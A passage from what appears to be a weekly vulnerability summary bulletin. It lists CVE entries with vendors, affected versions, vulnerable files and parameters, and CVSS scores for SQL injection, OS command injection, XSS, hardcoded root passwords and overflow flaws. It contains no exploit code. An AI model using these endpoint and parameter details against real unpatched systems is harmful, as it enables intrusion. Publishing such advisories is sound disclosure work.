sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a bundle provides a invalid signature for a checkpoint. This bug impacts clients using any variation of KeylessVerifier.verify(). Currently checkpoints are only used to ensure the root hash of an inclusion proof was provided by the log in question. Failing to validate that means a bundle may provide an inclusion proof that doesn't actually correspond to the log in question. This may eventually lead a monitor/witness being unable to detect when a compromised logs are providing different views of themselves to different clients. There are other mechanisms right now that mitigate this, such as the signed entry timestamp. Sigstore-java currently requires a valid signed entry timestamp. By correctly verifying the signed entry timestamp we can make certain assertions about the log signing the log entry (like the log was aware of the artifact signing event and signed it). Therefore the impact on clients that are not monitors/witnesses is very low. This vulnerability is fixed in 1.2.0. | 2024-12-05 | not yet calculated | CVE-2024-54140 |
| openwrt--asu |
openwrt/asu is an image on demand server for OpenWrt based distributions. The request hashing mechanism truncates SHA-256 hashes to only 12 characters. This significantly reduces entropy, making it feasible for an attacker to generate collisions. By exploiting this, a previously built malicious image can be served in place of a legitimate one, allowing the attacker to "poison" the artifact cache and deliver compromised images to unsuspecting users. This can be combined with other attacks, such as a command injection in Imagebuilder that allows malicious users to inject arbitrary commands into the build process, resulting in the production of malicious firmware images signed with the legitimate build key. This has been patched with 920c8a1. | 2024-12-06 | not yet calculated | CVE-2024-54143 |
| n/a--n/a |
WAVLINK WN701AE M01AE_V240305 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. | 2024-12-06 | not yet calculated | CVE-2024-54745 |
| n/a--n/a |
WAVLINK WN531P3 202383 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. | 2024-12-06 | not yet calculated | CVE-2024-54747 |
| n/a--n/a |
Ubiquiti U7-Pro 7.0.35 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. NOTE: this is disputed by the Supplier because the observation only established that a password is present in a firmware image; however, the device cannot be deployed without setting a new password during installation. | 2024-12-06 | not yet calculated | CVE-2024-54749 |
| n/a--n/a |
A Reflected Cross Site Scripting (XSS) vulnerability was found in /covidtms/registered-user-testing.php in PHPGurukul COVID 19 Testing Management System 1.0 which allows remote attackers to execute arbitrary code via the regmobilenumber parameter. | 2024-12-06 | not yet calculated | CVE-2024-55268 |
| n/a--n/a |
MailCleaner before 28d913e has default values of ssh_host_dsa_key, ssh_host_rsa_key, and ssh_host_ed25519_key that persist after installation. | 2024-12-08 | not yet calculated | CVE-2024-55560 |
| Tungsten Automation--TotalAgility |
Tungsten Automation (Kofax) TotalAgility in versions all through 7.9.0.25.0.954 is vulnerable to a Reflected XSS attacks through mfpConnectionId parameter manipulation in a form sent to endpoints "/TotalAgility/Kofax/BrowserDevice/ScanFront.aspx" and "/TotalAgility/Kofax/BrowserDevice/ScanFrontDebug.aspx" This allows for injection of a malicious JavaScript code, leading to a possible information leak. Exploitation is possible only while using POST requests and also requires retrieving/generating a proper VIEWSTATE parameter, which limits the risk of a successful attack. | 2024-12-06 | not yet calculated | CVE-2024-7874 |
| Tungsten Automation--TotalAgility |
Tungsten Automation (Kofax) TotalAgility in versions all through 7.9.0.25.0.954 is vulnerable to a Reflected XSS attacks through mfpScreenResolutionWidth parameter manipulation in a form sent to an endpoint /TotalAgility/Kofax/BrowserDevice/ScanFront.aspx This allows for injection of a malicious JavaScript code, leading to a possible information leak. Exploitation is possible only while using POST requests and also requires retrieving/generating a proper VIEWSTATE parameter, which limits the risk of a successful attack. | 2024-12-06 | not yet calculated | CVE-2024-7875 |
| Open Design Alliance--ODA Drawings SDK - All Versions < 2025.10 |
Out-of-bounds Write vulnerability was discovered in Open Design Alliance Drawings SDK before 2025.10. Reading crafted DWF file and missing proper checks on received SectionIterator data can trigger an unhandled exception. This can allow attackers to cause a crash, potentially enabling a denial-of-service attack (Crash, Exit, or Restart) or possible code execution. | 2024-12-04 | not yet calculated | CVE-2024-8894 |
Vulnerability Summary for the Week of November 25, 2024
Posted on Tuesday December 03, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Portfolio Management System MCA |
A vulnerability has been found in 1000 Projects Portfolio Management System MCA 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /register.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-26 | 7.3 | CVE-2024-11744 |
| 1000 Projects--Portfolio Management System MCA |
A vulnerability classified as critical was found in 1000 Projects Portfolio Management System MCA 1.0. This vulnerability affects unknown code of the file /forgot_password_process.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-27 | 7.3 | CVE-2024-11819 |
| 1000projects -- beauty_parlour_management_system |
A vulnerability classified as critical was found in 1000 Projects Beauty Parlour Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/edit-services.php. The manipulation of the argument sername leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 7.3 | CVE-2024-11646 |
| 1000projects -- beauty_parlour_management_system |
A vulnerability, which was classified as critical, has been found in 1000 Projects Beauty Parlour Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/view-appointment.php. The manipulation of the argument viewid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 7.3 | CVE-2024-11647 |
| 1000projects -- beauty_parlour_management_system |
A vulnerability, which was classified as critical, was found in 1000 Projects Beauty Parlour Management System 1.0. This affects an unknown part of the file /admin/add-customer.php. The manipulation of the argument name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 7.3 | CVE-2024-11648 |
| 1000projects -- beauty_parlour_management_system |
A vulnerability has been found in 1000 Projects Beauty Parlour Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/search-appointment.php. The manipulation of the argument searchdata leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 7.3 | CVE-2024-11649 |
| AbsolutePlugins--Absolute Addons For Elementor |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AbsolutePlugins Absolute Addons For Elementor allows Local Code Inclusion.This issue affects Absolute Addons For Elementor: from n/a through 1.0.14. | 2024-11-28 | 7.5 | CVE-2024-52496 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point and malicious commands are executed with root privileges. No authentication is enabled on the service and the source of the vulnerability resides in processing code associated to the "cfg_cmd_set_eth_conf" operation. | 2024-11-26 | 9.8 | CVE-2024-50370 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point and malicious commands are executed with root privileges. No authentication is enabled on the service and the source of the vulnerability resides in processing code associated to the "wlan_scan" operation. | 2024-11-26 | 9.8 | CVE-2024-50371 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point and malicious commands are executed with root privileges. No authentication is enabled on the service and the source of the vulnerability resides in processing code associated to the "backup_config_to_utility" operation. | 2024-11-26 | 9.8 | CVE-2024-50372 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point and malicious commands are executed with root privileges. No authentication is enabled on the service and the source of the vulnerability resides in processing code associated to the "restore_config_from_utility" operation. | 2024-11-26 | 9.8 | CVE-2024-50373 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point and malicious commands are executed with root privileges. No authentication is enabled on the service and the source of the vulnerability resides in processing code associated to the "capture_packages" operation. | 2024-11-26 | 9.8 | CVE-2024-50374 |
| Advantech--EKI-6333AC-2G |
A CWE-306 "Missing Authentication for Critical Function" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by remote unauthenticated users capable of interacting with the default "edgserver" service enabled on the access point. | 2024-11-26 | 9.8 | CVE-2024-50375 |
| Advantech--EKI-6333AC-2G |
A CWE-15 "External Control of System or Configuration Setting" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited by authenticated users by restoring a tampered configuration backup. | 2024-11-26 | 7.2 | CVE-2024-50358 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "scan_ap" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50359 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "snmp_apply" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50360 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "certificate_file_remove" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50361 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "connection_profile_apply" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50362 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "mp_apply" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50363 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "export_log" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50364 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "lan_apply" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50365 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "applications_apply" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50366 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "sta_log_htm" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50367 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "basic_htm" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50368 |
| Advantech--EKI-6333AC-2G |
A CWE-78 "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The source of the vulnerability relies on multiple parameters belonging to the "multiple_ssid_htm" API which are not properly sanitized before being concatenated to OS level commands. | 2024-11-26 | 7.2 | CVE-2024-50369 |
| Advantech--EKI-6333AC-2G |
A CWE-79 "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" was discovered affecting the following devices manufactured by Advantech: EKI-6333AC-2G (<= 1.6.3), EKI-6333AC-2GD (<= v1.6.3) and EKI-6333AC-1GPO (<= v1.2.1). The vulnerability can be exploited remotely leveraging a rogue Wi-Fi access point with a malicious SSID. | 2024-11-26 | 7.3 | CVE-2024-50376 |
| Anzia--Ni WooCommerce Cost Of Goods |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Anzia Ni WooCommerce Cost Of Goods allows SQL Injection.This issue affects Ni WooCommerce Cost Of Goods: from n/a through 3.2.8. | 2024-11-30 | 7.6 | CVE-2024-53783 |
| Apache Software Foundation--Apache Arrow R package |
Deserialization of untrusted data in IPC and Parquet readers in the Apache Arrow R package versions 4.0.0 through 16.1.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example, user-supplied input files). This vulnerability only affects the arrow R package, not other Apache Arrow implementations or bindings unless those bindings are specifically used via the R package (for example, an R application that embeds a Python interpreter and uses PyArrow to read files from untrusted sources is still vulnerable if the arrow R package is an affected version). It is recommended that users of the arrow R package upgrade to 17.0.0 or later. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to arrow 17.0.0 or later. If using an affected version of the package, untrusted data can read into a Table and its internal to_data_frame() method can be used as a workaround (e.g., read_parquet(..., as_data_frame = FALSE)$to_data_frame()). This issue affects the Apache Arrow R package: from 4.0.0 through 16.1.0. Users are recommended to upgrade to version 17.0.0, which fixes the issue. | 2024-11-28 | 9.8 | CVE-2024-52338 |
| Apache Software Foundation--Apache NimBLE |
Out-of-bounds Read vulnerability in Apache NimBLE. Missing proper validation of HCI Number Of Completed Packets could lead to out-of-bound access when parsing HCI event and invalid read from HCI transport memory. This issue requires broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2024-11-26 | 7.5 | CVE-2024-51569 |
| Astoundify--Jobify - Job Board WordPress Theme |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Astoundify Jobify - Job Board WordPress Theme allows Relative Path Traversal.This issue affects Jobify - Job Board WordPress Theme: from n/a through 4.2.3. | 2024-11-28 | 7.5 | CVE-2024-52481 |
| Automation Web Platform--Wawp |
Authentication Bypass Using an Alternate Path or Channel vulnerability in Automation Web Platform Wawp allows Authentication Bypass.This issue affects Wawp: from n/a before 3.0.18. | 2024-11-28 | 9.8 | CVE-2024-52475 |
| Axis Communications AB--AXIS Q6128-E PTZ Network Camera |
Florent Thiéry has found that selected Axis devices were vulnerable to handling certain ethernet frames which could lead to the Axis device becoming unavailable in the network. Axis has released patched AXIS OS versions for the highlighted flaw for products that are still under AXIS OS software support. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 7.5 | CVE-2024-47257 |
| Billion Electric--M100 |
Certain modes of routers from Billion Electric have a Missing Authentication vulnerability, allowing unauthenticated remote attackers to directly access the specific functionality to obtain partial device information, modify the WiFi SSID, and restart the device. | 2024-11-29 | 8.6 | CVE-2024-11980 |
| Billion Electric--M100 |
Certain models of routers from Billion Electric has an Authentication Bypass vulnerability, allowing unautheticated attackers to retrive contents of arbitrary web pages. | 2024-11-29 | 7.5 | CVE-2024-11981 |
| Billion Electric--M100 |
Certain models of routers from Billion Electric has a Plaintext Storage of a Password vulnerability. Remote attackers with administrator privileges can access the user settings page to retrieve plaintext passwords. | 2024-11-29 | 7.2 | CVE-2024-11982 |
| Billion Electric--M100 |
Certain models of routers from Billion Electric has an OS Command Injection vulnerability, allowing remote attackers with administrator privileges to inject arbitrary system commands into a specific SSH function and execute them on the device. | 2024-11-29 | 7.2 | CVE-2024-11983 |
| boldgrid--Total Upkeep WordPress Backup Plugin plus Restore & Migrate by BoldGrid |
The Total Upkeep - WordPress Backup Plugin plus Restore & Migrate by BoldGrid plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.16.6 via the cron_interval parameter. This is due to missing input validation and sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server. | 2024-11-26 | 7.2 | CVE-2024-9461 |
| cleantalk--Security & Malware scan by CleanTalk |
The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-11-26 | 7.5 | CVE-2024-10570 |
| cleantalk--Spam protection, Anti-Spam, FireWall by CleanTalk |
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. | 2024-11-26 | 9.8 | CVE-2024-10542 |
| cleantalk--Spam protection, Anti-Spam, FireWall by CleanTalk |
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an missing empty value check on the 'api_key' value in the 'perform' function in all versions up to, and including, 6.44. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. | 2024-11-26 | 8.1 | CVE-2024-10781 |
| code-projects--Concert Ticket Ordering System |
A vulnerability classified as critical has been found in code-projects Concert Ticket Ordering System 1.0. Affected is an unknown function of the file /tour(cor).php. The manipulation of the argument mai leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11970 |
| code-projects--Simple Car Rental System |
A vulnerability classified as critical was found in code-projects Simple Car Rental System 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument uname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 7.3 | CVE-2024-11962 |
| Codezips--E-Commerce Site |
A vulnerability classified as critical was found in Codezips E-Commerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file search.php. The manipulation of the argument keywords leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 7.3 | CVE-2024-11663 |
| contest-gallery--Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery Upload, Vote, Sell via PayPal, Social Share Buttons |
The Contest Gallery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 24.0.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2024-11-28 | 9.8 | CVE-2024-11103 |
| contiki-ng--contiki-ng |
Contiki-NG is an open-source, cross-platform operating system for IoT devices. An out-of-bounds read of 1 byte can be triggered when sending a packet to a device running the Contiki-NG operating system with SNMP enabled. The SNMP module is disabled in the default Contiki-NG configuration. The vulnerability exists in the os/net/app-layer/snmp/snmp-ber.c module, where the function snmp_ber_decode_string_len_buffer decodes the string length from a received SNMP packet. In one place, one byte is read from the buffer, without checking that the buffer has another byte available, leading to a possible out-of-bounds read. The problem has been patched in Contiki-NG pull request #2936. It will be included in the next release of Contiki-NG. Users are advised to apply the patch manually or to wait for the next release. A workaround is to disable the SNMP module in the Contiki-NG build configuration. | 2024-11-27 | 8.3 | CVE-2024-41125 |
| contiki-ng--contiki-ng |
Contiki-NG is an open-source, cross-platform operating system for IoT devices. An out-of-bounds read of 1 byte can be triggered when sending a packet to a device running the Contiki-NG operating system with SNMP enabled. The SNMP module is disabled in the default Contiki-NG configuration. The vulnerability exists in the os/net/app-layer/snmp/snmp-message.c module, where the snmp_message_decode function fails to check the boundary of the message buffer when reading a byte from it immediately after decoding an object identifier (OID). The problem has been patched in Contiki-NG pull request 2937. It will be included in the next release of Contiki-NG. Users are advised to either apply the patch manually or to wait for the next release. A workaround is to disable the SNMP module in the Contiki-NG build configuration. | 2024-11-27 | 8.3 | CVE-2024-41126 |
| contiki-ng--contiki-ng |
Contiki-NG is an open-source, cross-platform operating system for IoT devices. An unaligned memory access can be triggered in the two RPL implementations of the Contiki-NG operating system. The problem can occur when either one of these RPL implementations is enabled and connected to an RPL instance. If an IPv6 packet containing an odd number of padded bytes before the RPL option, it can cause the rpl_ext_header_hbh_update function to read a 16-bit integer from an odd address. The impact of this unaligned read is architecture-dependent, but can potentially cause the system to crash. The problem has not been patched as of release 4.9, but will be included in the next release. One can apply the changes in Contiki-NG pull request #2962 to patch the system or wait for the next release. | 2024-11-27 | 7.5 | CVE-2024-47181 |
| Cool Plugins--Cryptocurrency Widgets For Elementor |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Cool Plugins Cryptocurrency Widgets For Elementor allows PHP Local File Inclusion.This issue affects Cryptocurrency Widgets For Elementor: from n/a through 1.6.4. | 2024-11-30 | 8.1 | CVE-2024-53739 |
| Cradlepoint--NetCloud Exchange Client |
The NetCloud Exchange client for Windows, version 1.110.50, contains an insecure file and folder permissions vulnerability. A normal (non-admin) user could exploit the weakness in file and folder permissions to escalate privileges, execute arbitrary code and maintain persistence on the compromised machine. It has been identified that full control permissions exist on the 'Everyone' group (i.e. any user who has local access to the operating system regardless of their privileges). | 2024-11-28 | 8.8 | CVE-2024-11969 |
| D-Link--DIR-605L |
A vulnerability was found in D-Link DIR-605L 2.13B01. It has been classified as critical. This affects the function formResetStatistic of the file /goform/formResetStatistic. The manipulation of the argument curTime leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 8.8 | CVE-2024-11959 |
| D-Link--DIR-605L |
A vulnerability was found in D-Link DIR-605L 2.13B01. It has been declared as critical. This vulnerability affects the function formSetPortTr of the file /goform/formSetPortTr. The manipulation of the argument curTime leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 8.8 | CVE-2024-11960 |
| DapperDuckling--keycloak-connector |
@dapperduckling/keycloak-connector-server is an opinionated series of libraries for Node.js applications and frontend clients to interface with keycloak. A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the authentication flow of the application. This issue arises due to improper sanitization of the URL parameters, allowing the URL bar's contents to be injected and reflected into the HTML page. An attacker could craft a malicious URL to execute arbitrary JavaScript in the browser of a victim who visits the link. Any application utilizing this authentication library is vulnerable. Users of the application are at risk if they can be lured into clicking on a crafted malicious link. The vulnerability has been patched in version 2.5.5 by ensuring proper sanitization and escaping of user input in the affected URL parameters. Users are strongly encouraged to upgrade. If upgrading is not immediately possible, users can implement the following workarounds: 1. Employ a Web Application Firewall (WAF) to block malicious requests containing suspicious URL parameters. or 2. Apply input validation and escaping directly within the application's middleware or reverse proxy layer, specifically targeting the affected parameters. | 2024-11-26 | 8.1 | CVE-2024-53843 |
| Dell--Wyse Management Suite |
Dell Wyse Management Suite, version WMS 4.4 and before, contain an Authentication Bypass by Capture-replay vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Denial of service. | 2024-11-26 | 7.6 | CVE-2024-49595 |
| Dell--Wyse Management Suite |
Dell Wyse Management Suite, versions WMS 4.4 and prior, contain an Improper Restriction of Excessive Authentication Attempts vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass. | 2024-11-26 | 7.6 | CVE-2024-49597 |
| Eniture Technology--Distance Based Shipping Calculator |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eniture Technology Distance Based Shipping Calculator allows SQL Injection.This issue affects Distance Based Shipping Calculator: from n/a through 2.0.21. | 2024-11-28 | 8.5 | CVE-2024-52495 |
| Essential Marketer--Essential Breadcrumbs |
Cross-Site Request Forgery (CSRF) vulnerability in Essential Marketer Essential Breadcrumbs allows Stored XSS.This issue affects Essential Breadcrumbs: from n/a through 1.1.1. | 2024-11-30 | 7.1 | CVE-2024-53778 |
| FUJI ELECTRIC CO., LTD. and Hakko Electronics Co., Ltd.--TELLUS |
There is an Out-of-bounds read vulnerability in TELLUS (v4.0.19.0 and earlier) and TELLUS Lite (v4.0.19.0 and earlier). If a user opens a specially crafted file, information may be disclosed and/or arbitrary code may be executed. | 2024-11-28 | 7.8 | CVE-2024-38389 |
| FUJI ELECTRIC CO., LTD. and Hakko Electronics Co., Ltd.--V-Server |
There is an Out-of-bounds read vulnerability in V-Server (v4.0.19.0 and earlier) and V-Server Lite (v4.0.19.0 and earlier). If a user opens a specially crafted file, information may be disclosed and/or arbitrary code may be executed. | 2024-11-28 | 7.8 | CVE-2024-38658 |
| FUJI ELECTRIC CO., LTD. and Hakko Electronics Co., Ltd.--V-SFT |
There are multiple stack-based buffer overflow vulnerabilities in V-SFT (v6.2.2.0 and earlier), TELLUS (v4.0.19.0 and earlier), and TELLUS Lite (v4.0.19.0 and earlier). If a user opens a specially crafted file, information may be disclosed and/or arbitrary code may be executed. | 2024-11-28 | 7.8 | CVE-2024-38309 |
| GitLab--GitLab |
An issue has been discovered in GitLab CE/EE affecting all versions from 8.12 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. This issue allows an attacker with access to a victim's Personal Access Token (PAT) to escalate privileges. | 2024-11-26 | 8.2 | CVE-2024-8114 |
| Google--Android |
In checkPermissions of RecognitionService.java, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-27 | 8.4 | CVE-2017-13316 |
| Google--Android |
In String16 of String16.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-27 | 8.4 | CVE-2017-13323 |
| Google--Android |
In pvmp3_get_main_data_size of pvmp3_get_main_data_size.cpp, there is a possible buffer overread due to a missing bounds check. This could lead to remote information disclosure of global static variables with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-27 | 7.5 | CVE-2017-13319 |
| Google--Android |
In installPackageLI of PackageManagerService.java, there is a possible permissions bypass. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. | 2024-11-28 | 7.8 | CVE-2018-9374 |
| Google--Chrome |
Integer overflow in Layout in Google Chrome prior to 129.0.6668.89 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-11-27 | 8.8 | CVE-2024-7025 |
| Hewlett Packard Enterprise (HPE)--HPE Insight Remote Support |
A directory traversal vulnerability in Hewlett Packard Enterprise Insight Remote Support may allow remote code execution. | 2024-11-27 | 9.8 | CVE-2024-53676 |
